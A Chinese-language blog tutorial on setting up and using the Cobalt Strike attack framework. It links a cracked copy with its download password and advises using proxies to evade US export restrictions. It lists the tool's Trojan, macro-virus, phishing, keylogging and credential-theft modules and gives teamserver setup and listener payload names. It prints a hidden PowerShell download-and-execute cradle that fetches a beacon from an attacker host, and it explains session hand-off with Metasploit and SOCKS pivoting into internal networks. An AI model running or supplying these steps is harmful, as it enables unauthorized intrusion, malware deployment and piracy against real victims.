Cobalt Strike 一款以 metasploit 为基础的 GUI 的框架式渗透测试工具,集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe 木马生成,win dll 木马生成,java 木马生成,office 宏病毒生成,木马捆绑。
钓鱼攻击包括:站点克隆,目标信息获取,java 执行,浏览器自动攻击等等。
Cobalt Strike 主要用于团队作战,可谓是团队渗透神器,能让多个攻击者同时连接到团体服务器上,共享攻击资源与目标信息和 sessions。
Cobalt Strike 据说现在最新版为 3.9,主要分为试用版和付费版,试用版为 21 天,付费版 3500 美元,据说网上也有一些破解教程
cobaltstrik3.6 破解版下载
https://pan.baidu.com/s/1qYocNbm 密码: 51tg。
因为 Cobalt Strike 是美国对外限制型出口软件,只在美国和加拿大允许发售,所以我们需要 google 搜索下 usa 的个人代理来绕开限制。
0x01 安装与运行
Cobalt Strike 需要 JAVA 环境,需要注意的是 JAVA 环境不要安装最新版,否则会出一些问题,Cobalt Strike 分为客户端和服务端可分布式操作可以协同作战。但一定要架设在外网上,或者自己想要搭建的环境中,服务器端只能运行在 Linux 系统上。其中关键的文件是 teamserver 以及 cobaltstrike.jar,将这两个文件放到服务器上同一个目录,然后运行:
./teamserver 192.168.3.32 test #自己的 IP 和密码
说一下我安装运行时遇到的坑:
首先:JAVA 版本必须为 8,否则就因版本问题无法编译运行;
其次:IP 必须为真实 IP,不能使用 0.0.0.0 或者 127.0.0.1,这样也会报错的。
服务器端运行之后,我们就可以运行客户端了,客户端可以在 Windows 或者 Linux 下都可以。
输入我们刚才 IP 以及端口、密码,用户名可以任意设置。
当攻击目标在控制台所操作的指令都会被记录到保留在 Cobalt Strike 目录 logs 下,对了,破解版是无法更新的。
0x02 参数详情
Cobalt Strike
New Connection #进行另外一个连接,支持连接多个服务器端 Preferences #设置 Cobal Strike 界面、控制台、以及输出报告样式、TeamServer 连接记录 Visualization #主要展示输出结果的形式 VPN Interfaces #设置 VPN 接口 Listenrs #创建一个 Listener Script Manager Close #退出连接
View
Applications #显示受害者机器的应用信息 Credentials #凭证当通过 hashdump 或者 Mimikatz 抓取过的密码都会储存在这里。 Downloads #下载文件 Event Log #主机上线记录以及团队协作聊天记录 Keystrokes #键盘记录 Proxy Pivots #代理模块 Screenshots #进程截图 Script Console #控制台,在这里可以加载各种脚本
https://github.com/rsmudge/cortana-scripts以增强功能 Targets #显示目标 Web Log #Web访问记录
Attacks
Packages #攻击包` HTML Application 生成恶意的 HTA 木马文件 MS Office Macro 生成 office 宏病毒文件 Payload Generator 生成各种语言版本的 payload USB/CD AutoPlay 生成利用自动播放运行的木马文件 Windows Dropper 捆绑器,能够对文档类进行捆绑 Windows Executable 生成可执行 exe 木马 Windows Executable(S) 生成无状态的可执行 exe 木马 `Web Drive-by #钓鱼攻击` Manage 对开启的 web 服务进行管理 Clone Site 克隆网站,可以记录受害者提交的数据 Host File 提供一个文件下载,可以修改 Mime 信息 PowerShell Web Delivery 类似于 msf 的 web_delivery Signed Applet Attack 使用 java 自签名的程序进行钓鱼攻击 Smart Applet Attack 自动检测 java 版本并进行攻击,针对 Java 1.6.0_45 以下以及 Java 1.7.0_21 以下版本 System Profiler 用来获取一些系统信息,比如系统版本,Flash 版本,浏览器版本等 `Spear Phish #用来邮件钓鱼的模块
Reporting
activity report #活动报告生成 Hosts report #主机报告 Indicators opromisef com #目标报告 Sessions report #会话报告 Social engineering report #社会工程报告 Export data #数据出口
help
Homepage #官方主页 Support #技术支持 Arsenal #开发者 System information #版本信息 About #关于
0x03 基本运行
首先使用 Cobalt Strike 需要创建一个 Listener,点击 Cobalt Strike->Listeners ,然后点击 Add 便可以创建自己想要的 Listeners 了, Cobalt Strike3.6 包括
windows/beacon_dns/reverse_dns_txt windows/beacon_dns/reverse_http windows/beacon_http/reverse_http windows/beacon_https/reverse_https windows/beacon_smb/bind_pipe windows/foreign/reverse_dns_txt windows/foreign/reverse_http windows/foreign/reverse_https windows/foreign/reverse_tcp
其中 windows/beacon 是 Cobalt Strike 自带的模块,包括 dns、http、https、smb 四种方式的监听器,windows/foreign 为外部监听器,即 msf 或者 Armitage 的监听器。选择监听器以后,host 会自动填写我们开启服务时的 ip,配置监听端口,然后保存,监听器就创建好了。
在创建好监听器,接下来就需要配置我们的客户端了,Cobalt Strike 提供了多种包括攻击方式,在这里我们使用 Powershell 进行攻击。
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.3.83:8888/a'))"
当我们在目标靶机运行上面这条 Powershell 之后,我们的 Cobalt Strike 客户端就会监听到我们的反弹链接,我们就可以看到已经有目标机上线。
0x04 与 msf 进行联动
cs 获得了一个上线机器,想把这个机器丢给 msf 中的 meterpreter 获得一个 session 进行控制
这里我们已经获得了一个上线机器。
在 msf 上执行下面的命令:
之后使用 Cobalt Strike 创建一个 windows/foreign/reverse_tcp Listener,其中 ip 为 msf 的 ip 地址,端口为 msf 所监听的端口,
然后选中计算机,右键->Spawn:选择刚刚创建的监听器:
这个时候我们可以看到,msf上的监听已经上线,我们可以进行我们想要的一些操作了。
msf 获得了一个 meterpreter 的 session,想把 session 传给 cs
这里我们已经获得了一个 meterpreter 的 session
在CS中创建一个监听者,和上一步类似,这里host需要修改为CS客户端IP,创建好之后我们便监听着6666端口,等待着被控机连接。
此时我们切换到 meterpreter 中:
此时机器便已成功从 cs 成功上线,可以进行各种姿势的操作。
cs 获得了一个上线机器,想把这个机器丢给 msf 中继续进行渗透
根据上线的肉鸡,可以使用 SOCKS 代理
配置 proxychains.conf,添加 socks4 127.0.0.1 32557,然后就可以通过 proxychains 使用各种工具做内网渗透了。
总结
Cobalt Strike 还有很多的奇淫技巧,这里只是简单的描述了一下用法,大家可以搭建环境动手玩一玩,可能会了解到更多的玩法和乐趣。
楼主残忍的关闭了评论